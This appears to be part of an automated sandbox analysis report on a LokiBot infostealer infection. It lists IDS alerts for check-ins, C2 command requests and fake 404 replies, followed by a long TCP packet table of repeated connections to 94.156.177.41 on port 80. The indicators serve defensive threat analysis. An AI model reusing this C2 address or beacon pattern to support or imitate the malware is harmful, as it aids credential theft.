2024-11-22T17:40:15.455772+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49981	94.156.177.41	80	TCP
2024-11-22T17:40:16.777601+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49981	94.156.177.41	80	TCP
2024-11-22T17:40:16.777601+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49981	94.156.177.41	80	TCP
2024-11-22T17:40:16.897699+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49981	TCP
2024-11-22T17:40:17.167831+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49984	94.156.177.41	80	TCP
2024-11-22T17:40:17.167831+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49984	94.156.177.41	80	TCP
2024-11-22T17:40:17.167831+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49984	94.156.177.41	80	TCP
2024-11-22T17:40:18.529455+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49984	94.156.177.41	80	TCP
2024-11-22T17:40:18.529455+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49984	94.156.177.41	80	TCP
2024-11-22T17:40:18.649027+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49984	TCP
2024-11-22T17:40:18.923857+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49990	94.156.177.41	80	TCP
2024-11-22T17:40:18.923857+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49990	94.156.177.41	80	TCP
2024-11-22T17:40:18.923857+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49990	94.156.177.41	80	TCP
2024-11-22T17:40:20.330214+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49990	94.156.177.41	80	TCP
2024-11-22T17:40:20.330214+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49990	94.156.177.41	80	TCP
2024-11-22T17:40:20.449796+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49990	TCP
2024-11-22T17:40:20.873102+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49995	94.156.177.41	80	TCP
2024-11-22T17:40:20.873102+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49995	94.156.177.41	80	TCP
2024-11-22T17:40:20.873102+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49995	94.156.177.41	80	TCP
2024-11-22T17:40:22.279856+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49995	94.156.177.41	80	TCP
2024-11-22T17:40:22.279856+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49995	94.156.177.41	80	TCP
2024-11-22T17:40:22.401027+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49995	TCP
2024-11-22T17:40:22.672655+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50000	94.156.177.41	80	TCP
2024-11-22T17:40:22.672655+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50000	94.156.177.41	80	TCP
2024-11-22T17:40:22.672655+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50000	94.156.177.41	80	TCP
2024-11-22T17:40:24.138359+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50000	94.156.177.41	80	TCP
2024-11-22T17:40:24.138359+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50000	94.156.177.41	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 22, 2024 17:38:20.137862921 CET	49733	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:20.260165930 CET	80	49733	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:20.260262966 CET	49733	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:20.262320042 CET	49733	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:20.381899118 CET	80	49733	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:20.385793924 CET	49733	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:20.506242037 CET	80	49733	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:21.672959089 CET	80	49733	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:21.673105001 CET	49733	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:21.673769951 CET	80	49733	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:21.673820972 CET	49733	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:21.794495106 CET	80	49733	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:21.808927059 CET	49735	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:21.930843115 CET	80	49735	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:21.930949926 CET	49735	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:21.933479071 CET	49735	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:22.053076029 CET	80	49735	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:22.053196907 CET	49735	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:22.172765970 CET	80	49735	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:23.332376003 CET	80	49735	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:23.332487106 CET	80	49735	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:23.332524061 CET	49735	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:23.332729101 CET	49735	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:23.418351889 CET	49736	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:23.452244997 CET	80	49735	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:23.538078070 CET	80	49736	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:23.538388014 CET	49736	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:23.543745041 CET	49736	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:23.664089918 CET	80	49736	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:23.667762995 CET	49736	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:23.788616896 CET	80	49736	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:24.937561989 CET	80	49736	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:24.937700987 CET	80	49736	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:24.937743902 CET	49736	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:24.937743902 CET	49736	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:25.060055971 CET	80	49736	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:25.100286961 CET	49738	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:25.294733047 CET	80	49738	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:25.294951916 CET	49738	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:25.299732924 CET	49738	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:25.419250965 CET	80	49738	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:25.419739008 CET	49738	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:25.539408922 CET	80	49738	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:26.772850990 CET	80	49738	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:26.773046017 CET	80	49738	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:26.773102045 CET	49738	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:26.777545929 CET	49738	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:26.901212931 CET	80	49738	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:26.930571079 CET	49739	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:27.056574106 CET	80	49739	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:27.056672096 CET	49739	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:27.059416056 CET	49739	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:27.183681965 CET	80	49739	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:27.183871984 CET	49739	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:27.303469896 CET	80	49739	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:28.639436007 CET	80	49739	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:28.639604092 CET	80	49739	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:28.639683008 CET	49739	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:28.639683008 CET	49739	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:28.759253025 CET	80	49739	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:28.791460037 CET	49740	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:28.911700010 CET	80	49740	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:28.911786079 CET	49740	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:28.914505005 CET	49740	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:29.035039902 CET	80	49740	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:29.035149097 CET	49740	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:29.155675888 CET	80	49740	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:30.444330931 CET	80	49740	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:30.444484949 CET	80	49740	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:30.444495916 CET	49740	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:30.444556952 CET	49740	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:30.564948082 CET	80	49740	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:30.601917028 CET	49741	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:30.722234964 CET	80	49741	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:30.722369909 CET	49741	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:30.724769115 CET	49741	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:30.844373941 CET	80	49741	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:30.844446898 CET	49741	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:30.967636108 CET	80	49741	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:32.251027107 CET	80	49741	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:32.251152992 CET	80	49741	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:32.251169920 CET	49741	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:32.251214027 CET	49741	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:32.375027895 CET	80	49741	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:32.416835070 CET	49743	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:32.536413908 CET	80	49743	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:32.536786079 CET	49743	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:32.538633108 CET	49743	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:32.660919905 CET	80	49743	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:32.663837910 CET	49743	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:32.783415079 CET	80	49743	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:33.940777063 CET	80	49743	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:33.940817118 CET	80	49743	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:33.940876961 CET	49743	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:33.940916061 CET	49743	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:34.060918093 CET	80	49743	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:34.088253975 CET	49745	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:34.207823992 CET	80	49745	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:34.207920074 CET	49745	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:34.211275101 CET	49745	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:34.330879927 CET	80	49745	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:34.331046104 CET	49745	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:34.450628996 CET	80	49745	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:35.739247084 CET	80	49745	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:35.739339113 CET	80	49745	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:35.739391088 CET	49745	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:35.739444971 CET	49745	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:35.862947941 CET	80	49745	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:35.883506060 CET	49748	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:36.007707119 CET	80	49748	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:36.007818937 CET	49748	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:36.009876966 CET	49748	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:36.394360065 CET	49748	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:36.400959969 CET	80	49748	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:36.401062012 CET	49748	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:36.515647888 CET	80	49748	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:36.521666050 CET	80	49748	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:37.721430063 CET	80	49748	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:37.721477032 CET	80	49748	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:37.721602917 CET	49748	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:37.725712061 CET	49748	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:37.847124100 CET	80	49748	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:37.869770050 CET	49749	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:37.989345074 CET	80	49749	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:37.989429951 CET	49749	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:37.991627932 CET	49749	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:38.111229897 CET	80	49749	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:38.111285925 CET	49749	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:38.231889009 CET	80	49749	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:39.565046072 CET	80	49749	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:39.565068960 CET	80	49749	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:39.565165997 CET	49749	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:39.565165997 CET	49749	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:39.689057112 CET	80	49749	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:39.706327915 CET	49751	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:39.826114893 CET	80	49751	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:39.826231956 CET	49751	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:39.828217983 CET	49751	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:39.947945118 CET	80	49751	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:39.948024988 CET	49751	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:40.067854881 CET	80	49751	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:41.267765045 CET	80	49751	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:41.267779112 CET	80	49751	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:41.267831087 CET	49751	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:41.268070936 CET	49751	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:41.388206959 CET	80	49751	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:41.413249969 CET	49753	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:41.535583973 CET	80	49753	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:41.535676956 CET	49753	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:41.537769079 CET	49753	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:41.658865929 CET	80	49753	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:41.659081936 CET	49753	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:41.778654099 CET	80	49753	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:43.017709017 CET	80	49753	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:43.017901897 CET	80	49753	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:43.017978907 CET	49753	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:43.018102884 CET	49753	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:43.138286114 CET	80	49753	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:43.170975924 CET	49754	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:43.290558100 CET	80	49754	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:43.290704012 CET	49754	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:43.293705940 CET	49754	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:43.413337946 CET	80	49754	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:43.413429976 CET	49754	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:43.534756899 CET	80	49754	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:44.821378946 CET	80	49754	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:44.821525097 CET	49754	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:44.821686983 CET	80	49754	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:44.821751118 CET	49754	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:44.941143036 CET	80	49754	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:44.957221985 CET	49755	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:45.077297926 CET	80	49755	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:45.077439070 CET	49755	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:45.079622030 CET	49755	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:45.199644089 CET	80	49755	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:45.199702024 CET	49755	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:45.319600105 CET	80	49755	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:46.587224960 CET	80	49755	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:46.587265015 CET	80	49755	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:46.587353945 CET	49755	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:46.587394953 CET	49755	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:46.707140923 CET	80	49755	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:46.725450993 CET	49756	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:46.846040010 CET	80	49756	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:46.846203089 CET	49756	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:46.848512888 CET	49756	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:46.970364094 CET	80	49756	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:46.970644951 CET	49756	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:47.095890999 CET	80	49756	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:48.298242092 CET	80	49756	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:48.298368931 CET	80	49756	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:48.298382044 CET	49756	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:48.298453093 CET	49756	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:48.418123007 CET	80	49756	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:48.447061062 CET	49757	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:48.566957951 CET	80	49757	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:48.567092896 CET	49757	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:48.569140911 CET	49757	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:48.693805933 CET	80	49757	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:48.693876982 CET	49757	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:48.819236994 CET	80	49757	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:50.103084087 CET	80	49757	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:50.103179932 CET	80	49757	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:50.103231907 CET	49757	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:50.103554010 CET	49757	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:50.222754002 CET	80	49757	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:50.252827883 CET	49758	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:50.372426033 CET	80	49758	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:50.372561932 CET	49758	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:50.374321938 CET	49758	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:50.493808985 CET	80	49758	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:50.493984938 CET	49758	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:50.615389109 CET	80	49758	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:51.915977001 CET	80	49758	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:51.916115999 CET	80	49758	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:51.916181087 CET	49758	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:51.922749043 CET	49758	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:52.042226076 CET	80	49758	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:52.068408966 CET	49759	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:52.188014030 CET	80	49759	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:52.188101053 CET	49759	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:52.189835072 CET	49759	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:52.309343100 CET	80	49759	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:52.309427023 CET	49759	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:52.428996086 CET	80	49759	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:53.760936022 CET	80	49759	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:53.761030912 CET	80	49759	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:53.761107922 CET	49759	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:53.761153936 CET	49759	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:53.883990049 CET	80	49759	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:53.909797907 CET	49760	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:54.034085989 CET	80	49760	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:54.035665035 CET	49760	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:54.037755966 CET	49760	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:54.157320976 CET	80	49760	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:54.159921885 CET	49760	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:54.280143023 CET	80	49760	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:55.610198021 CET	80	49760	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:55.610382080 CET	80	49760	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:55.610382080 CET	49760	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:55.610471010 CET	49760	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:55.733469009 CET	80	49760	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:55.763942957 CET	49762	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:55.884566069 CET	80	49762	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:55.884691000 CET	49762	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:55.886729002 CET	49762	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:56.007050991 CET	80	49762	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:56.007118940 CET	49762	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:56.128679037 CET	80	49762	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:57.457268953 CET	80	49762	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:57.457422018 CET	49762	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:57.457474947 CET	80	49762	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:57.457541943 CET	49762	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:57.577178955 CET	80	49762	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:57.605179071 CET	49768	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:57.725462914 CET	80	49768	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:57.725872993 CET	49768	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:57.727844954 CET	49768	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:57.847414017 CET	80	49768	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:57.847692966 CET	49768	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:57.968549013 CET	80	49768	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:59.302567005 CET	80	49768	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:59.302710056 CET	49768	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:59.302737951 CET	80	49768	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:59.302794933 CET	49768	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:59.426546097 CET	80	49768	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:59.440942049 CET	49769	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:59.608441114 CET	80	49769	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:59.608582020 CET	49769	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:59.610678911 CET	49769	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:59.730158091 CET	80	49769	94.156.177.41	192.168.2.4
Nov 22, 2024 17:38:59.730254889 CET	49769	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:38:59.850593090 CET	80	49769	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:01.010632992 CET	80	49769	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:01.010755062 CET	49769	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:01.010855913 CET	80	49769	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:01.010906935 CET	49769	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:01.131407022 CET	80	49769	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:01.149786949 CET	49775	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:01.269344091 CET	80	49775	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:01.269783020 CET	49775	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:01.271894932 CET	49775	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:01.391530991 CET	80	49775	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:01.391644955 CET	49775	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:01.512151957 CET	80	49775	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:02.801037073 CET	80	49775	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:02.801172972 CET	49775	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:02.801379919 CET	80	49775	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:02.801434040 CET	49775	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:02.920927048 CET	80	49775	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:02.945754051 CET	49781	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:03.065608978 CET	80	49781	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:03.065876961 CET	49781	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:03.067959070 CET	49781	80	192.168.2.4	94.156.177.41
